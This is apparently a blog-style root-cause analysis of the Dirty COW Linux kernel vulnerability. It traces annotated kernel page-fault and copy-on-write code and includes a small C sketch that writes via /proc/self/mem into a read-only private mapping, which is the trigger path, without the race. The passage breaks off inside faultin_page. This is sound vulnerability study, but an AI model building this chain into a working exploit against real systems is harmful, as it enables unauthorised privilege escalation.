Preface
CVE-2016-5195 is the famous Dirty COW vulnerability. I had heard about its elegance long ago and had exploited it on a practice range before, but back then I just grabbed an exploit script off the internet and never looked at the underlying bug. So this time I want to briefly analyse how the vulnerability arises and how it can be used in a simple way.
Note: this article focuses on recording the vulnerability trigger chain; it does not explore the concrete exploitation techniques for Dirty COW.
It assumes the reader already knows or is familiar with: the COW mechanism, page tables, mmap memory mapping, the page cache, and so on.
One thing worth pointing out: when mmap creates a mapping, it only carves out a vma in the anonymous/file mapping area; no physical memory is allocated at that point, i.e. the corresponding pte is empty. On the first real access a page fault is triggered, and the fault handler allocates a physical page and fills in the pte.
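As a quick illustration (this is my own minimal sketch, not taken from the original analysis; the mapping size is an arbitrary choice), the minor-fault counter only increases once the freshly mmap'ed region is actually touched:
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/resource.h>

static long minor_faults(void)
{
    struct rusage ru;
    getrusage(RUSAGE_SELF, &ru);
    return ru.ru_minflt;
}

int main(void)
{
    size_t len = 16 * 4096; /* arbitrary size: 16 pages */
    /* the vma is created here, but no physical pages are allocated yet */
    char *p = mmap(NULL, len, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return 1;

    long before = minor_faults();
    memset(p, 0x41, len); /* first touch: page faults allocate pages and fill the ptes */
    long after = minor_faults();

    printf("minor faults caused by the first touch: %ld\n", after - before);
    munmap(p, len);
    return 0;
}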
Overview of page fault handling
The rough call chain is:
// __do_page_fault()
//   __handle_mm_fault()
//     handle_pte_fault()
//       do_wp_page()        ==> pte present in memory, write fault
//       do_fault()          ==> pte not present, i.e. first-touch handling for non-anonymous pages
//         do_read_fault()
//         do_cow_fault()    ==> fault caused by a write to a private mapping
//         do_shared_fault()
__do_page_fault
/*
* This routine handles page faults. It determines the address,
* and the problem, and then passes it off to one of the appropriate
* routines.
*
* This function must have noinline because both callers
* {,trace_}do_page_fault() have notrace on. Having this an actual function
* guarantees there's a function trace entry.
*/
static noinline void
__do_page_fault(struct pt_regs *regs, unsigned long error_code,
unsigned long address)
{
struct vm_area_struct *vma;
struct task_struct *tsk;
struct mm_struct *mm;
int fault, major = 0;
// start out with the allow-retry and killable flags set
unsigned int flags = FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_KILLABLE;
tsk = current;
mm = tsk->mm;
/*
* Detect and handle instructions that would cause a page fault for
* both a tracked kernel page and a userspace page.
*/
if (kmemcheck_active(regs))
kmemcheck_hide(regs);
prefetchw(&mm->mmap_sem); // prefetch the mmap_sem cache line for writing
if (unlikely(kmmio_fault(regs, address)))
return;
/*
* We fault-in kernel-space virtual memory on-demand. The
* 'reference' page table is init_mm.pgd.
*
* NOTE! We MUST NOT take any locks for this case. We may
* be in an interrupt or a critical region, and should
* only copy the information from the master page table,
* nothing more.
*
* This verifies that the fault happens in kernel space
* (error_code & 4) == 0, and that the fault was not a
* protection error (error_code & 9) == 0.
*/
// address lies in kernel space
if (unlikely(fault_in_kernel_space(address))) {
if (!(error_code & (PF_RSVD | PF_USER | PF_PROT))) {
// PF_RSVD: a reserved bit was set in a page-table entry
// PF_USER: the fault happened in user mode
// PF_PROT: protection violation (the page was present)
if (vmalloc_fault(address) >= 0)
return;
if (kmemcheck_fault(regs, address, error_code))
return;
}
/* Can handle a stale RO->RW TLB: */
// was this a spurious fault?
if (spurious_fault(error_code, address))
return;
/* kprobes don't want to hook the spurious faults: */
if (kprobes_fault(regs))
return;
/*
* Don't take the mm semaphore here. If we fixup a prefetch
* fault we could otherwise deadlock:
*/
bad_area_nosemaphore(regs, error_code, address, NULL);
return;
}
// address lies in user space
/* kprobes don't want to hook the spurious faults: */
if (unlikely(kprobes_fault(regs)))
return;
if (unlikely(error_code & PF_RSVD)) // a reserved bit was set: corrupted page table
pgtable_bad(regs, error_code, address);
if (unlikely(smap_violation(error_code, regs))) { // SMAP violation
bad_area_nosemaphore(regs, error_code, address, NULL);
return;
}
/*
* If we're in an interrupt, have no user context or are running
* in a region with pagefaults disabled then we must not take the fault
*/
if (unlikely(faulthandler_disabled() || !mm)) {
bad_area_nosemaphore(regs, error_code, address, NULL);
return;
}
/*
* It's safe to allow irq's after cr2 has been saved and the
* vmalloc fault has been handled.
*
* User-mode registers count as a user access even for any
* potential system fault or CPU buglet:
*/
// the fault came from user mode
if (user_mode(regs)) {
local_irq_enable(); // re-enable local interrupts
error_code |= PF_USER; // mark this as a user-mode fault
flags |= FAULT_FLAG_USER;
} else {
if (regs->flags & X86_EFLAGS_IF)
local_irq_enable();
}
perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
if (error_code & PF_WRITE) // the fault was caused by a write
flags |= FAULT_FLAG_WRITE;
if (error_code & PF_INSTR)
flags |= FAULT_FLAG_INSTRUCTION;
/*
* When running in the kernel we expect faults to occur only to
* addresses in user space. All other faults represent errors in
* the kernel and should generate an OOPS. Unfortunately, in the
* case of an erroneous fault occurring in a code path which already
* holds mmap_sem we will deadlock attempting to validate the fault
* against the address space. Luckily the kernel only validly
* references user space from well defined areas of code, which are
* listed in the exceptions table.
*
* As the vast majority of faults will be valid we will only perform
* the source reference check when there is a possibility of a
* deadlock. Attempt to lock the address space, if we cannot we then
* validate the source. If this is invalid we can skip the address
* space check, thus avoiding the deadlock:
*/
// take mmap_sem for reading
if (unlikely(!down_read_trylock(&mm->mmap_sem))) { // trylock failed
if ((error_code & PF_USER) == 0 &&
!search_exception_tables(regs->ip)) {
bad_area_nosemaphore(regs, error_code, address, NULL);
return;
}
retry:
down_read(&mm->mmap_sem);
} else {
/*
* The above down_read_trylock() might have succeeded in
* which case we'll have missed the might_sleep() from
* down_read():
*/
might_sleep();
}
vma = find_vma(mm, address); // look up the vma containing address
if (unlikely(!vma)) { // no such vma: bad area
bad_area(regs, error_code, address);
return;
}
if (likely(vma->vm_start <= address)) // address falls inside this vma
goto good_area;
if (unlikely(!(vma->vm_flags & VM_GROWSDOWN))) { // not a stack vma (no VM_GROWSDOWN flag): bad area
bad_area(regs, error_code, address);
return;
}
if (error_code & PF_USER) {
/*
* Accessing the stack below %sp is always a bug.
* The large cushion allows instructions like enter
* and pusha to work. ("enter $65535, $31" pushes
* 32 pointers and then decrements %sp by 65535.)
*/
if (unlikely(address + 65536 + 32 * sizeof(unsigned long) < regs->sp)) {
bad_area(regs, error_code, address);
return;
}
}
if (unlikely(expand_stack(vma, address))) { // grow the stack vma
bad_area(regs, error_code, address);
return;
}
/*
* Ok, we have a good vm_area for this memory access, so
* we can handle it..
*/
good_area: // reaching here means this is a legitimate fault: address belongs to the process's address space, so demand paging can now allocate physical memory
if (unlikely(access_error(error_code, vma))) {
bad_area_access_error(regs, error_code, address, vma);
return;
}
/*
* If for any reason at all we couldn't handle the fault,
* make sure we exit gracefully rather than endlessly redo
* the fault. Since we never set FAULT_FLAG_RETRY_NOWAIT, if
* we get VM_FAULT_RETRY back, the mmap_sem has been unlocked.
*/
// core routine that resolves the fault and allocates the physical page
fault = handle_mm_fault(mm, vma, address, flags);
major |= fault & VM_FAULT_MAJOR;
/*
* If we need to retry the mmap_sem has already been released,
* and if there is a fatal signal pending there is no guarantee
* that we made any progress. Handle this case first.
*/
if (unlikely(fault & VM_FAULT_RETRY)) { // a retry was requested; allow it at most once
/* Retry at most once */
if (flags & FAULT_FLAG_ALLOW_RETRY) {
flags &= ~FAULT_FLAG_ALLOW_RETRY; // clear the allow-retry flag
flags |= FAULT_FLAG_TRIED;
if (!fatal_signal_pending(tsk))
goto retry;
}
/* User mode? Just return to handle the fatal exception */
if (flags & FAULT_FLAG_USER)
return;
/* Not returning to user mode? Handle exceptions or die: */
no_context(regs, error_code, address, SIGBUS, BUS_ADRERR);
return;
}
up_read(&mm->mmap_sem);
if (unlikely(fault & VM_FAULT_ERROR)) {
mm_fault_error(regs, error_code, address, vma, fault);
return;
}
/*
* Major/minor page fault accounting. If any of the events
* returned VM_FAULT_MAJOR, we account it as a major fault.
*/
if (major) {
tsk->maj_flt++;
perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, regs, address);
} else {
tsk->min_flt++;
perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, regs, address);
}
check_v8086_mode(regs, address, tsk);
}
NOKPROBE_SYMBOL(__do_page_fault);
Rough flow:
- Decide whether address lies in kernel space or in user space.
- Kernel space: if the relevant conditions are met, handle it with vmalloc_fault.
- User space:
  - For a write fault, set the FAULT_FLAG_WRITE flag.
  - If the checks pass, hand the fault to handle_mm_fault.
handle_mm_fault ==> __handle_mm_fault
handle_mm_fault mainly just calls __handle_mm_fault:
/*
* By the time we get here, we already hold the mm semaphore
*
* The mmap_sem may have been released depending on flags and our
* return value. See filemap_fault() and __lock_page_or_retry().
*/
static int __handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, unsigned int flags)
{
// the four levels of page table entries
pgd_t *pgd;
pud_t *pud;
pmd_t *pmd;
pte_t *pte;
if (!arch_vma_access_permitted(vma, flags & FAULT_FLAG_WRITE,
flags & FAULT_FLAG_INSTRUCTION,
flags & FAULT_FLAG_REMOTE))
return VM_FAULT_SIGSEGV;
if (unlikely(is_vm_hugetlb_page(vma)))
return hugetlb_fault(mm, vma, address, flags);
pgd = pgd_offset(mm, address); // locate the page global directory entry
pud = pud_alloc(mm, pgd, address); // allocate the page upper directory entry if needed
if (!pud)
return VM_FAULT_OOM;
pmd = pmd_alloc(mm, pud, address); // allocate the page middle directory entry if needed
if (!pmd)
return VM_FAULT_OOM;
if (pmd_none(*pmd) && transparent_hugepage_enabled(vma)) {
int ret = create_huge_pmd(mm, vma, address, pmd, flags);
if (!(ret & VM_FAULT_FALLBACK))
return ret;
} else {
pmd_t orig_pmd = *pmd;
int ret;
barrier();
if (pmd_trans_huge(orig_pmd) || pmd_devmap(orig_pmd)) {
unsigned int dirty = flags & FAULT_FLAG_WRITE;
if (pmd_protnone(orig_pmd))
return do_huge_pmd_numa_page(mm, vma, address,
orig_pmd, pmd);
if (dirty && !pmd_write(orig_pmd)) {
ret = wp_huge_pmd(mm, vma, address, pmd,
orig_pmd, flags);
if (!(ret & VM_FAULT_FALLBACK))
return ret;
} else {
huge_pmd_set_accessed(mm, vma, address, pmd,
orig_pmd, dirty);
return 0;
}
}
}
/*
* Use pte_alloc() instead of pte_alloc_map, because we can't
* run pte_offset_map on the pmd, if an huge pmd could
* materialize from under us from a different thread.
*/
if (unlikely(pte_alloc(mm, pmd, address)))
return VM_FAULT_OOM;
/*
* If a huge pmd materialized under us just retry later. Use
* pmd_trans_unstable() instead of pmd_trans_huge() to ensure the pmd
* didn't become pmd_trans_huge under us and then back to pmd_none, as
* a result of MADV_DONTNEED running immediately after a huge pmd fault
* in a different thread of this mm, in turn leading to a misleading
* pmd_trans_huge() retval. All we have to ensure is that it is a
* regular pmd that we can walk with pte_offset_map() and we can do that
* through an atomic read in C, which is what pmd_trans_unstable()
* provides.
*/
if (unlikely(pmd_trans_unstable(pmd) || pmd_devmap(*pmd)))
return 0;
/*
* A regular pmd is established and it can't morph into a huge pmd
* from under us anymore at this point because we hold the mmap_sem
* read mode and khugepaged takes it in write mode. So now it's
* safe to run pte_offset_map().
*/
pte = pte_offset_map(pmd, address); // map and fetch the page table entry
return handle_pte_fault(mm, vma, address, pte, pmd, flags); // core fault handler
}
Rough flow:
- Allocate the intermediate page table levels and obtain the pte.
- In the normal case, finally hand the fault to handle_pte_fault.
handle_pte_fault
/*
* These routines also need to handle stuff like marking pages dirty
* and/or accessed for architectures that don't do it in hardware (most
* RISC architectures). The early dirtying is also good on the i386.
*
* There is also a hook called "update_mmu_cache()" that architectures
* with external mmu caches can use to update those (ie the Sparc or
* PowerPC hashed page tables that act as extended TLBs).
*
* We enter with non-exclusive mmap_sem (to exclude vma changes,
* but allow concurrent faults), and pte mapped but not yet locked.
* We return with pte unmapped and unlocked.
*
* The mmap_sem may have been released depending on flags and our
* return value. See filemap_fault() and __lock_page_or_retry().
*/
static int handle_pte_fault(struct mm_struct *mm,
struct vm_area_struct *vma, unsigned long address,
pte_t *pte, pmd_t *pmd, unsigned int flags)
{
pte_t entry;
spinlock_t *ptl;
/*
* some architectures can have larger ptes than wordsize,
* e.g.ppc44x-defconfig has CONFIG_PTE_64BIT=y and CONFIG_32BIT=y,
* so READ_ONCE or ACCESS_ONCE cannot guarantee atomic accesses.
* The code below just needs a consistent view for the ifs and
* we later double check anyway with the ptl lock held. So here
* a barrier will do.
*/
entry = *pte; // read the pte contents
barrier();
// the page is not present in memory
if (!pte_present(entry)) {
if (pte_none(entry)) { // empty pte: first access to this page
if (vma_is_anonymous(vma)) // anonymous page
return do_anonymous_page(mm, vma, address,
pte, pmd, flags);
else
return do_fault(mm, vma, address, pte, pmd,
flags, entry); // non-anonymous (file-backed) page
}
// non-empty pte: the page was accessed before and swapped out, bring it back from the swap area
return do_swap_page(mm, vma, address,
pte, pmd, flags, entry);
}
// the page is present in memory
if (pte_protnone(entry))
return do_numa_page(mm, vma, address, entry, pte, pmd);
ptl = pte_lockptr(mm, pmd);
spin_lock(ptl); // take the page table spinlock
if (unlikely(!pte_same(*pte, entry))) // re-check against concurrent modification
goto unlock;
if (flags & FAULT_FLAG_WRITE) { // write fault (FAULT_FLAG_WRITE)
if (!pte_write(entry)) // the page is not writable
return do_wp_page(mm, vma, address,
pte, pmd, ptl, entry); // perform COW; on the write path this reuses the page allocated by do_fault()->do_cow_fault()
entry = pte_mkdirty(entry); // mark the page dirty
}
entry = pte_mkyoung(entry); // set the accessed (young) bit
if (ptep_set_access_flags(vma, address, pte, entry, flags & FAULT_FLAG_WRITE)) {
update_mmu_cache(vma, address, pte); // the pte changed, write the new value back into the page table
} else {
/*
* This is needed only for protection faults but the arch code
* is not yet telling us if this is a protection fault or not.
* This still avoids useless tlb flushes for .text page faults
* with threads.
*/
if (flags & FAULT_FLAG_WRITE)
flush_tlb_fix_spurious_fault(vma, address);
}
unlock:
pte_unmap_unlock(pte, ptl);
return 0;
}
Rough flow:
- Read the pte for the faulting address.
- The page is not present in memory:
  - The pte is empty:
    - Anonymous page: handled by do_anonymous_page.
    - Non-anonymous page: handled by do_fault.
  - The pte is not empty: the page was swapped out, bring it back from swap.
- The page is present in memory:
  - Write fault:
    - The page is not writable: call do_wp_page to perform COW.
    - The page is writable: mark it dirty.
  - Not a write fault: update the pte.
do_fault ==> handling of non-anonymous (file-backed) pages
/*
* We enter with non-exclusive mmap_sem (to exclude vma changes,
* but allow concurrent faults).
* The mmap_sem may have been released depending on flags and our
* return value. See filemap_fault() and __lock_page_or_retry().
*/
static int do_fault(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, pte_t *page_table, pmd_t *pmd,
unsigned int flags, pte_t orig_pte)
{
pgoff_t pgoff = linear_page_index(vma, address);
pte_unmap(page_table);
/* The VMA was not fully populated on mmap() or missing VM_DONTEXPAND */
if (!vma->vm_ops->fault)
return VM_FAULT_SIGBUS;
if (!(flags & FAULT_FLAG_WRITE)) // not a write fault
return do_read_fault(mm, vma, address, pmd, pgoff, flags,
orig_pte);
if (!(vma->vm_flags & VM_SHARED)) // private (non-shared) mapping
return do_cow_fault(mm, vma, address, pmd, pgoff, flags,
orig_pte);
return do_shared_fault(mm, vma, address, pmd, pgoff, flags, orig_pte); // shared mapping
}
Rough flow:
- Fault caused by a read: handled by do_read_fault.
- Fault caused by a write to a private mapping: handled by do_cow_fault.
- Fault caused by anything else (a write to a shared mapping): handled by do_shared_fault.
do_cow_fault
static int do_cow_fault(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, pmd_t *pmd,
pgoff_t pgoff, unsigned int flags, pte_t orig_pte)
{
struct page *fault_page, *new_page;
struct mem_cgroup *memcg;
spinlock_t *ptl;
pte_t *pte;
int ret;
if (unlikely(anon_vma_prepare(vma)))
return VM_FAULT_OOM;
new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, address); // allocate a new physical page
if (!new_page)
return VM_FAULT_OOM;
if (mem_cgroup_try_charge(new_page, mm, GFP_KERNEL, &memcg, false)) {
put_page(new_page);
return VM_FAULT_OOM;
}
ret = __do_fault(vma, address, pgoff, flags, new_page, &fault_page); // read the file contents into fault_page
if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
goto uncharge_out;
if (fault_page)
copy_user_highpage(new_page, fault_page, address, vma); // copy the contents of fault_page into new_page
__SetPageUptodate(new_page);
pte = pte_offset_map_lock(mm, pmd, address, &ptl); // map the pte and take the page table lock
if (unlikely(!pte_same(*pte, orig_pte))) { // re-check against concurrent modification
pte_unmap_unlock(pte, ptl);
if (fault_page) {
unlock_page(fault_page);
put_page(fault_page);
} else {
/*
* The fault handler has no page to lock, so it holds
* i_mmap_lock for read to protect against truncate.
*/
i_mmap_unlock_read(vma->vm_file->f_mapping);
}
goto uncharge_out;
}
// install the new pte for this process, pointing it at new_page; for a write the entry is also marked dirty
do_set_pte(vma, address, new_page, pte, true, true);
mem_cgroup_commit_charge(new_page, memcg, false, false);
lru_cache_add_active_or_unevictable(new_page, vma);
pte_unmap_unlock(pte, ptl);
if (fault_page) {
unlock_page(fault_page);
put_page(fault_page); // drop the reference to fault_page
} else {
/*
* The fault handler has no page to lock, so it holds
* i_mmap_lock for read to protect against truncate.
*/
i_mmap_unlock_read(vma->vm_file->f_mapping);
}
return ret;
uncharge_out:
mem_cgroup_cancel_charge(new_page, memcg, false);
put_page(new_page);
return ret;
}
Rough flow:
- Allocate a new page and copy the file contents into it.
- Install it in the page table.
Note: at this point nothing has actually been written yet.
do_wp_page
static int do_wp_page(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, pte_t *page_table, pmd_t *pmd,
spinlock_t *ptl, pte_t orig_pte)
__releases(ptl)
{
struct page *old_page;
old_page = vm_normal_page(vma, address, orig_pte);
if (!old_page) {
/*
* VM_MIXEDMAP !pfn_valid() case, or VM_SOFTDIRTY clear on a
* VM_PFNMAP VMA.
*
* We should not cow pages in a shared writeable mapping.
* Just mark the pages writable and/or call ops->pfn_mkwrite.
*/
if ((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
(VM_WRITE|VM_SHARED))
return wp_pfn_shared(mm, vma, address, page_table, ptl,
orig_pte, pmd);
pte_unmap_unlock(page_table, ptl);
return wp_page_copy(mm, vma, address, page_table, pmd,
orig_pte, old_page);
}
/*
* Take out anonymous pages first, anonymous shared vmas are
* not dirty accountable.
*/
// handle anonymous pages first
if (PageAnon(old_page) && !PageKsm(old_page)) {
int total_mapcount;
if (!trylock_page(old_page)) { // lock contention: retake the lock and re-validate
get_page(old_page);
pte_unmap_unlock(page_table, ptl);
lock_page(old_page);
page_table = pte_offset_map_lock(mm, pmd, address,
&ptl);
if (!pte_same(*page_table, orig_pte)) {
unlock_page(old_page);
pte_unmap_unlock(page_table, ptl);
put_page(old_page);
return 0;
}
put_page(old_page);
}
// the real handling starts here:
// reuse_swap_page() first checks whether this page has only a single user; if so, wp_page_reuse() simply reuses it
if (reuse_swap_page(old_page, &total_mapcount)) {
if (total_mapcount == 1) {
/*
* The page is all ours. Move it to
* our anon_vma so the rmap code will
* not search our parent or siblings.
* Protected against the rmap code by
* the page lock.
*/
page_move_anon_rmap(compound_head(old_page),
vma, address);
}
unlock_page(old_page);
// the normal COW flow ends up here: the page already allocated by do_cow_fault() is reused, no new page is allocated
return wp_page_reuse(mm, vma, address, page_table, ptl,
orig_pte, old_page, 0, 0);
}
unlock_page(old_page);
} else if (unlikely((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
(VM_WRITE|VM_SHARED))) {
return wp_page_shared(mm, vma, address, page_table, pmd,
ptl, orig_pte, old_page);
}
/*
* Ok, we need to copy. Oh, well..
*/
get_page(old_page);
pte_unmap_unlock(page_table, ptl);
return wp_page_copy(mm, vma, address, page_table, pmd,
orig_pte, old_page);
}
COW and page faults
When we mmap a read-only file and then try to write directly into one of the mapped pages through the /proc/self/mem file, the write is dispatched to the mem_write handler in the corresponding file_operations table (a small user-space sketch of such a write follows the table below):
static const struct file_operations proc_mem_operations = {
.llseek = mem_lseek,
.read = mem_read,
.write = mem_write,
.open = mem_open,
.release = mem_release,
};
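Before diving into mem_write, here is a rough user-space sketch (my own illustration; the file path is an arbitrary assumption) of the kind of write the rest of this section traces: a write() on /proc/self/mem at the address of a private, read-only mapping.
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

int main(void)
{
    int fd = open("/etc/hostname", O_RDONLY); /* any readable file of a few bytes will do */
    char *map = mmap(NULL, 0x1000, PROT_READ, MAP_PRIVATE, fd, 0);
    if (fd < 0 || map == MAP_FAILED)
        return 1;

    int mem = open("/proc/self/mem", O_RDWR);
    /* seek to the virtual address of the mapping, then write "through" it */
    lseek(mem, (off_t)(uintptr_t)map, SEEK_SET);
    write(mem, "AAAA", 4); /* this write is dispatched to mem_write()/mem_rw() */

    /* without the race, only the private COW copy changes; the file on disk stays intact */
    printf("mapping now starts with: %.4s\n", map);
    return 0;
}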
The mem_write entry itself is just a thin wrapper around mem_rw:
static ssize_t mem_write(struct file *file, const char __user *buf,
size_t count, loff_t *ppos)
{
return mem_rw(file, (char __user*)buf, count, ppos, 1);
}
mem_rw
static ssize_t mem_rw(struct file *file, char __user *buf,
size_t count, loff_t *ppos, int write)
{
struct mm_struct *mm = file->private_data;
unsigned long addr = *ppos;
ssize_t copied;
char *page;
if (!mm)
return 0;
page = (char *)__get_free_page(GFP_TEMPORARY); // allocate a temporary free page
if (!page)
return -ENOMEM;
copied = 0;
if (!atomic_inc_not_zero(&mm->mm_users))
goto free;
while (count > 0) {
int this_len = min_t(int, count, PAGE_SIZE);
// for a write, first copy the user-space data into the temporary page
if (write && copy_from_user(page, buf, this_len)) {
copied = -EFAULT;
break;
}
// access_remote_vm() performs the actual memory access
this_len = access_remote_vm(mm, addr, page, this_len, write);
if (!this_len) {
if (!copied)
copied = -EIO;
break;
}
// for a read, the requested data has already been read into the temporary page; copy it back to user space
if (!write && copy_to_user(buf, page, this_len)) {
copied = -EFAULT;
break;
}
buf += this_len;
addr += this_len;
copied += this_len;
count -= this_len;
}
*ppos = addr;
mmput(mm);
free: // release the temporary page
free_page((unsigned long) page);
return copied;
}
Rough flow:
- Call __get_free_page() to allocate a free page as a temporary buffer for the user data.
- Call access_remote_vm() to perform the memory access, reading or writing the target pages according to the write argument.
access_remote_vm
which in turn is just a wrapper around __access_remote_vm:
int access_remote_vm(struct mm_struct *mm, unsigned long addr,
void *buf, int len, int write)
{
return __access_remote_vm(NULL, mm, addr, buf, len, write);
}
__access_remote_vm
static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
unsigned long addr, void *buf, int len, int write)
{
struct vm_area_struct *vma;
void *old_buf = buf;
down_read(&mm->mmap_sem);
/* ignore errors, just check how much was successfully transferred */
while (len) {
int bytes, ret, offset;
void *maddr;
struct page *page = NULL;
// get the target page of the access (the page we will read from / write to)
ret = get_user_pages_remote(tsk, mm, addr, 1,
write, 1, &page, &vma);
if (ret <= 0) { // failed to get the page
#ifndef CONFIG_HAVE_IOREMAP_PROT
break;
#else
/*
* Check if this is a VM_IO | VM_PFNMAP VMA, which
* we can access using slightly different code.
*/
vma = find_vma(mm, addr);
if (!vma || vma->vm_start > addr)
break;
if (vma->vm_ops && vma->vm_ops->access)
ret = vma->vm_ops->access(vma, addr, buf,
len, write);
if (ret <= 0)
break;
bytes = ret;
#endif
} else {
bytes = len;
offset = addr & (PAGE_SIZE-1);
if (bytes > PAGE_SIZE-offset)
bytes = PAGE_SIZE-offset;
// kmap gives the page a temporary kernel mapping: we only hold a struct page, so it has to be mapped to a virtual address before we can access it
maddr = kmap(page);
if (write) {
copy_to_user_page(vma, page, addr,
maddr + offset, buf, bytes); // write the data into the target page
set_page_dirty_lock(page);
} else {
copy_from_user_page(vma, page, addr,
buf, maddr + offset, bytes); // read the data from the target page
}
kunmap(page);
put_page(page);
}
len -= bytes;
buf += bytes;
addr += bytes;
}
up_read(&mm->mmap_sem);
return buf - old_buf;
}
Rough flow:
- Use get_user_pages_remote() to get the target page (note that this returns a struct page, since the physical page does not necessarily have a usable mapping).
- Use kmap() to obtain the virtual address that the page is mapped to (building a new temporary mapping if there is none).
- Use copy_from_user_page()/copy_to_user_page() to read from or write to the page.
The code I analysed seems to differ slightly from what is posted online; I am not sure whether that is a kernel version difference or whether I am looking at patched code, but never mind.
get_user_pages_remote
is a wrapper around __get_user_pages_locked:
long get_user_pages_remote(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, unsigned long nr_pages,
int write, int force, struct page **pages,
struct vm_area_struct **vmas)
{
return __get_user_pages_locked(tsk, mm, start, nr_pages, write, force,
pages, vmas, NULL, false,
FOLL_TOUCH | FOLL_REMOTE);
}
EXPORT_SYMBOL(get_user_pages_remote);
__get_user_pages_locked in turn ends up calling __get_user_pages:
static __always_inline long __get_user_pages_locked(struct task_struct *tsk,
struct mm_struct *mm,
unsigned long start,
unsigned long nr_pages,
int write, int force,
struct page **pages,
struct vm_area_struct **vmas,
int *locked, bool notify_drop,
unsigned int flags)
{
long ret, pages_done;
bool lock_dropped;
if (locked) {
/* if VM_FAULT_RETRY can be returned, vmas become invalid */
BUG_ON(vmas);
/* check caller initialized locked */
BUG_ON(*locked != 1);
}
if (pages)
flags |= FOLL_GET;
if (write)
flags |= FOLL_WRITE;
if (force)
flags |= FOLL_FORCE;
pages_done = 0;
lock_dropped = false;
for (;;) {
ret = __get_user_pages(tsk, mm, start, nr_pages, flags, pages,
vmas, locked);
......
Note: for a write, the FOLL_WRITE flag is set.
__get_user_pages
long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, unsigned long nr_pages,
unsigned int gup_flags, struct page **pages,
struct vm_area_struct **vmas, int *nonblocking)
{
long i = 0;
unsigned int page_mask;
struct vm_area_struct *vma = NULL;
if (!nr_pages)
return 0;
VM_BUG_ON(!!pages != !!(gup_flags & FOLL_GET));
/*
* If FOLL_FORCE is set then do not force a full fault as the hinting
* fault information is unrelated to the reference behaviour of a task
* using the address space
*/
if (!(gup_flags & FOLL_FORCE))
gup_flags |= FOLL_NUMA;
do {
struct page *page;
unsigned int foll_flags = gup_flags;
unsigned int page_increm;
/* first iteration or cross vma bound */
if (!vma || start >= vma->vm_end) {
vma = find_extend_vma(mm, start);
if (!vma && in_gate_area(mm, start)) {
int ret;
ret = get_gate_page(mm, start & PAGE_MASK,
gup_flags, &vma,
pages ? &pages[i] : NULL);
if (ret)
return i ? : ret;
page_mask = 0;
goto next_page;
}
if (!vma || check_vma_flags(vma, gup_flags))
return i ? : -EFAULT;
if (is_vm_hugetlb_page(vma)) {
i = follow_hugetlb_page(mm, vma, pages, vmas,
&start, &nr_pages, i,
gup_flags);
continue;
}
}
retry:
/*
* If we have a pending SIGKILL, don't keep faulting pages and
* potentially allocating memory.
*/
if (unlikely(fatal_signal_pending(current)))
return i ? i : -ERESTARTSYS;
cond_resched();
page = follow_page_mask(vma, start, foll_flags, &page_mask); // look up the physical page (struct page) behind the virtual address
if (!page) { // lookup failed
/*
 * Two possible reasons:
 * (1) there is no physical page yet (no mapping to a physical page has been established), or
 * (2) the page exists but we lack the required permission (e.g. the page is not writable).
 * The COW flow hits (1) first and then (2).
 */
int ret;
ret = faultin_page(tsk, vma, start, &foll_flags,
nonblocking); // [core] handle the page fault
switch (ret) {
case 0:
goto retry; // fault handled successfully, go back and try to fetch the page again
case -EFAULT:
case -ENOMEM:
case -EHWPOISON:
return i ? i : ret;
case -EBUSY:
return i;
case -ENOENT:
goto next_page;
}
BUG();
} else if (PTR_ERR(page) == -EEXIST) {
/*
* Proper page table entry exists, but no corresponding
* struct page.
*/
goto next_page;
} else if (IS_ERR(page)) {
return i ? i : PTR_ERR(page);
}
if (pages) {
pages[i] = page;
flush_anon_page(vma, page, start);
flush_dcache_page(page);
page_mask = 0;
}
next_page:
if (vmas) {
vmas[i] = vma;
page_mask = 0;
}
page_increm = 1 + (~(start >> PAGE_SHIFT) & page_mask);
if (page_increm > nr_pages)
page_increm = nr_pages;
i += page_increm;
start += page_increm * PAGE_SIZE;
nr_pages -= page_increm;
} while (nr_pages);
return i;
}
EXPORT_SYMBOL(__get_user_pages);
Two key points about COW here:
- As mentioned at the very beginning, mmap does not establish a mapping between the page and a physical page; it merely hands out a virtual address. So follow_page_mask returns NULL at this point; since no page was obtained, faultin_page() is called to resolve the fault and allocate a physical page.
- After faultin_page() successfully resolves the fault, control returns to the retry label and follow_page_mask is called again. If the current process has no write permission for the page, it still returns NULL; since no page was obtained, faultin_page() is called again, and this time it performs the copy-on-write.
faultin_page
static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
unsigned long address, unsigned int *flags, int *nonblocking)
{
struct mm_struct *mm = vma->vm_mm;
unsigned int fault_flags = 0;
int ret;
/* mlock all present pages, but do not fault in new pages */
if ((*flags & (FOLL_POPULATE | FOLL_MLOCK)) == FOLL_MLOCK)
return -ENOENT;
/* For mm_populate(), just skip the stack guard page. */
if ((*flags & FOLL_POPULATE) &&
(stack_guard_page_start(vma, address) ||
stack_guard_page_end(vma, address + PAGE_SIZE)))
return -ENOENT;
if (*flags & FOLL_WRITE) // we want to write to the page, so this flag is present
fault_flags |= FAULT_FLAG_WRITE;
if (*flags & FOLL_REMOTE)
fault_flags |= FAULT_FLAG_REMOTE;
if (nonblocking)
fault_flags |= FAULT_FLAG_ALLOW_RETRY;
if (*flags & FOLL_NOWAIT)
fault_flags |= FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_RETRY_NOWAIT;
